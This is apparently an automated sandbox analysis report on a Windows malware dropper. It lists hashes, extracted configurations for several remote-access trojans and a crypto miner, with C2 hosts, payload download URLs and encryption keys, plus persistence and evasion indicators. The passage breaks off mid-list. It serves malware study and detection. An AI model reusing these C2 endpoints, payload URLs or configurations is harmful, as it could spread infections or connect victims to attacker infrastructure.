Analysis
-
max time kernel
69s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-01-2025 04:58
General
-
Target
New Text Document mod.exe
-
Size
761KB
-
MD5
c6040234ee8eaedbe618632818c3b1b3
-
SHA1
68115f8c3394c782aa6ba663ac78695d2b80bf75
-
SHA256
bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0
-
SHA512
a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf
-
SSDEEP
12288:mMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9mWej:mnsJ39LyjbJkQFMhmC+6GD9I
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
remcos
fuck
republicadominica2025.ip-ddns.com:30202
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
rostad
-
mouse_option
false
-
mutex
iwebfiewbfihbewlfkm-WH4782
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
quasar
1.3.0.0
School
gamwtonxristo.ddns.net:1717
QSR_MUTEX_M3Vba1npfJg3Ale25C
-
encryption_key
VtojWKM7f1XyCVdB41wL
-
install_name
comctl32.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Defender Startup Scan
-
subdirectory
Windows Defender
Extracted
quasar
1.4.1
Office04
0.tcp.in.ngrok.io:14296
193.161.193.99:20466
cc827307-beb6-456e-b5dd-e28a204ebd45
-
encryption_key
93486CAE624EBAD6626412E4A7DC6221B139DAA8
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
xworm
5.0
137.184.74.73:5000
XukSoXxFQFDQJQvq
-
Install_directory
%ProgramData%
-
install_file
System.exe
Extracted
asyncrat
0.5.8
Default
2.tcp.eu.ngrok.io:19695
gonq3XlXWgiz
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/2452-598-0x0000000000900000-0x0000000000910000-memory.dmp family_xworm behavioral2/memory/2452-598-0x0000000000900000-0x0000000000910000-memory.dmp family_xworm -
description flow ioc Process 171 api.ipify.org Process not Found 173 api.ipify.org Process not Found 179 ipinfo.io Process not Found 196 api.ipify.org Process not Found 257 ip-api.com Process not Found 95 ip-api.com Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe -
Quasar family
-
Quasar payload 6 IoCs
resource yara_rule behavioral2/memory/4756-505-0x0000000000420000-0x00000000004A6000-memory.dmp family_quasar behavioral2/memory/1768-524-0x0000000000670000-0x0000000000994000-memory.dmp family_quasar behavioral2/memory/1864-558-0x0000000000C90000-0x0000000000FB4000-memory.dmp family_quasar behavioral2/memory/4756-505-0x0000000000420000-0x00000000004A6000-memory.dmp family_quasar behavioral2/memory/1768-524-0x0000000000670000-0x0000000000994000-memory.dmp family_quasar behavioral2/memory/1864-558-0x0000000000C90000-0x0000000000FB4000-memory.dmp family_quasar -
Remcos family
-
Xmrig family
-
Xred family
-
Xworm family
-
XMRig Miner payload 14 IoCs
resource yara_rule behavioral2/memory/3316-460-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-466-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-465-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-463-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-462-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-464-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-459-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-460-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-466-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-465-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-463-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-462-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-464-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3316-459-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4376 powershell.exe 4856 powershell.exe 4448 powershell.exe 3068 powershell.exe 1204 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts yuksefyj.exe File created C:\Windows\system32\drivers\etc\hosts Updater.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation ._cache_Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation comctl32.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Loader.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation comctl32.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation ._cache_New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation SecurityHealthHost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation NewApp.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk Loader.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk Loader.exe -
Executes dropped EXE 54 IoCs
pid Process 4292 ._cache_New Text Document mod.exe 1996 Synaptics.exe 2736 ._cache_Synaptics.exe 5112 NewApp.exe 988 Updater.exe 2636 4909_7122.exe 1984 fuck.exe 2556 remcos_a2.exe 1112 yuksefyj.exe 1200 4909_7122.exe 3820 Updater.exe 4816 lopads.exe 3032 Wallet-PrivateKey.Pdf.exe 1912 Pdf%20Reader.exe 4756 ogpayload.exe 1768 Client-base.exe 3300 svchost.exe 996 comctl32.exe 1864 Servers.exe 2972 FXServer.exe 4044 mac.exe 2452 Loader.exe 1908 Windows Defender SmartScreen (32 bit).exe 4960 ciscotest.exe 4856 Discord.exe 3284 SecurityHealthHost.exe 5264 comctl32.exe 4292 ._cache_New Text Document mod.exe 1996 Synaptics.exe 2736 ._cache_Synaptics.exe 5112 NewApp.exe 988 Updater.exe 2636 4909_7122.exe 1984 fuck.exe 2556 remcos_a2.exe 1112 yuksefyj.exe 1200 4909_7122.exe 3820 Updater.exe 4816 lopads.exe 3032 Wallet-PrivateKey.Pdf.exe 1912 Pdf%20Reader.exe 4756 ogpayload.exe 1768 Client-base.exe 3300 svchost.exe 996 comctl32.exe 1864 Servers.exe 2972 FXServer.exe 4044 mac.exe 2452 Loader.exe 1908 Windows Defender SmartScreen (32 bit).exe 4960 ciscotest.exe 4856 Discord.exe 3284 SecurityHealthHost.exe 5264 comctl32.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" New Text Document mod.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NordicVPN = "C:\\Users\\Admin\\Documents\\NordVPNnetworkTAP\\Lang\\RemotePCPrinter.exe" 4909_7122.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft-cb832607b4 = "C:\\Program Files (x86)\\Microsoft\\Temp\\Microsoft-cb832607b4.exe" FXServer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 27 IoCs
flow ioc 129 raw.githubusercontent.com 30 raw.githubusercontent.com 66 pastebin.com 136 raw.githubusercontent.com 157 raw.githubusercontent.com 191 discord.com 119 2.tcp.eu.ngrok.io 154 raw.githubusercontent.com 156 raw.githubusercontent.com 21 bitbucket.org 153 raw.githubusercontent.com 269 2.tcp.eu.ngrok.io 76 raw.githubusercontent.com 31 raw.githubusercontent.com 101 0.tcp.in.ngrok.io 152 raw.githubusercontent.com 10 bitbucket.org 77 raw.githubusercontent.com 92 raw.githubusercontent.com 155 raw.githubusercontent.com 186 discord.com 61 raw.githubusercontent.com 67 pastebin.com 163 2.tcp.eu.ngrok.io 246 0.tcp.in.ngrok.io 267 raw.githubusercontent.com 11 bitbucket.org -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 179 ipinfo.io 196 api.ipify.org 257 ip-api.com 95 ip-api.com 171 api.ipify.org 173 api.ipify.org -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum FXServer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 FXServer.exe -
Power Settings 1 TTPs 12 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3492 powercfg.exe 1628 powercfg.exe 1624 powercfg.exe 1908 powercfg.exe 6020 powercfg.exe 6012 powercfg.exe 6004 powercfg.exe 5044 powercfg.exe 728 powercfg.exe 4976 powercfg.exe 5044 powercfg.exe 6028 powercfg.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\System32\System-cb832607b4.exe FXServer.exe File created C:\Windows\SysWOW64\$LMX-cb832607b4.exe FXServer.exe File opened for modification C:\Windows\system32\MRT.exe yuksefyj.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe Updater.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 3820 set thread context of 2984 3820 Updater.exe 161 PID 3820 set thread context of 3316 3820 Updater.exe 166 PID 2972 set thread context of 5636 2972 FXServer.exe 222 PID 5636 set thread context of 5728 5636 svchost.exe 264 PID 3820 set thread context of 2984 3820 Updater.exe 161 PID 3820 set thread context of 3316 3820 Updater.exe 166 PID 2972 set thread context of 5636 2972 FXServer.exe 222 PID 5636 set thread context of 5728 5636 svchost.exe 264 -
resource yara_rule behavioral2/memory/3316-456-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-460-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-458-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-466-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-465-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-463-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-462-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-464-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-455-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-459-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-457-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-454-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-456-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-460-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-458-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-466-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-465-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-463-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-462-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-464-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-455-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-459-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-457-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3316-454-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Temp\Microsoft-cb832607b4.exe FXServer.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 740 sc.exe 1960 sc.exe 3240 sc.exe 4744 sc.exe 1440 sc.exe 3056 sc.exe 3872 sc.exe 2336 sc.exe 4724 sc.exe 2240 sc.exe 3028 sc.exe 3308 sc.exe 3400 sc.exe 3448 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 4300 996 WerFault.exe 179 5160 3300 WerFault.exe 173 5548 5264 WerFault.exe 211 4300 996 WerFault.exe 179 5160 3300 WerFault.exe 173 5548 5264 WerFault.exe 211 -
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wallet-PrivateKey.Pdf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Pdf%20Reader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ciscotest.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fuck.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language comctl32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language New Text Document mod.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4909_7122.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language comctl32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NewApp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Updater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language remcos_a2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ogpayload.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3140 PING.EXE 5000 PING.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 4564 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer FXServer.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS FXServer.exe -
Kills process with taskkill 1 IoCs
pid Process 5616 taskkill.exe -
Modifies data under HKEY_USERS 50 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 3140 PING.EXE 5000 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2460 schtasks.exe 3064 schtasks.exe 4760 schtasks.exe 4816 schtasks.exe 380 SCHTASKS.exe 5404 schtasks.exe 2452 schtasks.exe 4988 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2604 EXCEL.EXE 2604 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe 2636 4909_7122.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4292 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 2736 ._cache_Synaptics.exe Token: SeDebugPrivilege 4376 powershell.exe Token: SeDebugPrivilege 4856 powershell.exe Token: SeDebugPrivilege 4448 powershell.exe Token: SeDebugPrivilege 5112 NewApp.exe Token: SeDebugPrivilege 988 Updater.exe Token: SeShutdownPrivilege 3492 powercfg.exe Token: SeCreatePagefilePrivilege 3492 powercfg.exe Token: SeShutdownPrivilege 1628 powercfg.exe Token: SeCreatePagefilePrivilege 1628 powercfg.exe Token: SeShutdownPrivilege 728 powercfg.exe Token: SeCreatePagefilePrivilege 728 powercfg.exe Token: SeShutdownPrivilege 5044 powercfg.exe Token: SeCreatePagefilePrivilege 5044 powercfg.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeLockMemoryPrivilege 3316 explorer.exe Token: SeShutdownPrivilege 1624 powercfg.exe Token: SeCreatePagefilePrivilege 1624 powercfg.exe Token: SeShutdownPrivilege 4976 powercfg.exe Token: SeCreatePagefilePrivilege 4976 powercfg.exe Token: SeShutdownPrivilege 5044 powercfg.exe Token: SeCreatePagefilePrivilege 5044 powercfg.exe Token: SeShutdownPrivilege 1908 powercfg.exe Token: SeCreatePagefilePrivilege 1908 powercfg.exe Token: SeDebugPrivilege 3032 Wallet-PrivateKey.Pdf.exe Token: SeDebugPrivilege 1768 Client-base.exe Token: SeDebugPrivilege 4756 ogpayload.exe Token: SeDebugPrivilege 996 comctl32.exe Token: SeDebugPrivilege 1864 Servers.exe Token: SeDebugPrivilege 1908 Windows Defender SmartScreen (32 bit).exe Token: SeDebugPrivilege 2452 Loader.exe Token: SeDebugPrivilege 4044 mac.exe Token: SeDebugPrivilege 1204 powershell.exe Token: SeIncreaseQuotaPrivilege 4044 mac.exe Token: SeSecurityPrivilege 4044 mac.exe Token: SeTakeOwnershipPrivilege 4044 mac.exe Token: SeLoadDriverPrivilege 4044 